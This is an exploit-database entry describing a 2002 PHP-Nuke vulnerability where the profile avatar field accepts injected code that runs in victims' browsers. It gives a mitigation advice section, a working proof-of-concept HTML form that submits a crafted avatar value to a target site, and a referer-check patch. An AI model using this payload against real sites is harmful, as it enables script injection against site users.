PHP-Nuke Remote Code Execution Vulnerability

vendor:

PHP-Nuke

by:

SecurityFocus

7.5

CVSS

HIGH

Remote Code Execution

CWE

Product Name: PHP-Nuke

Affected Version From: PHP-Nuke 5.4

Affected Version To: PHP-Nuke 5.5.2

Patch Exists: YES

Related CWE: CVE-2002-1337

CPE: a:phpnuke:php-nuke

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: All

2002

PHP-Nuke Remote Code Execution Vulnerability

A problem with PHP-Nuke could allow remote users to execute arbitrary code in the context of the web site. The problem is in the lack of sanitization of some types of input. PHP-Nuke does not sanitize code submitted to a site from the avatar select box. Due to this, a malicious user may be able to submit embedded code from their profile page instead of an avatar. This would result in code being executed in the location where a user's avatar should normally display. This code would be executed by a victim user's browser in the context of the site.

Mitigation:

Input validation should be used to ensure that user-supplied data is properly sanitized. Additionally, the web server should be configured to disallow the execution of scripts from the web root directory.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/6750/info

A problem with PHP-Nuke could allow remote users to execute arbitrary code in the context of the web site. The problem is in the lack of sanitization of some types of input.

PHP-Nuke does not sanitize code submitted to a site from the avatar select box. Due to this, a malicious user may be able to submit embedded code from their profile page instead of an avatar. This would result in code being executed in the location where a user's avatar should normally display. This code would be executed by a victim user's browser in the context of the site.

<!-- START CODE --!>
<form name="Register"
action="http://NUKEDSITE/modules.php?name=Your_Account" method="post">

<b>Code ('">[code]<b ')</b><input type="text" name="user_avatar" size="30"
maxlength="30"><br><br>

<b>Username</b><input type="text" name="uname" size="30"
maxlength="255"><br><b>User ID:<input type="text" name="uid"
size="30"><input type="hidden" name="op" value="saveuser"><input
type="submit" value="Save Changes"></form>
<!-- END CODE --!>


To modify other users avatar information:

Search for "saveuser" you should get to a function that looks like this..

function saveuser($uid, $realname, $uname, $email, etc...

right underneath the function call, put this in..

$referer = getenv("HTTP_REFERER");
$nukeurl="http://digital-delusions.com";
$nukeurl2="http://digital-delusions.dyn.ee";
$nukeurl3="http://192.168.0.254";
if (substr("$referer",0,strlen($nukeurl))==$nukeurl OR
substr("$referer",0,strlen($nukeurl2))==$nukeurl2 OR
substr("$referer",0,strlen($nukeurl3))==$nukeurl3) {

make sure u change my URLs to your site's urls.

[ ... ]

Header("Location: modules.php?name=$module_name");
}
}
}

before the last "}" paste this..

} else {
echo "delusion ownz j00";
}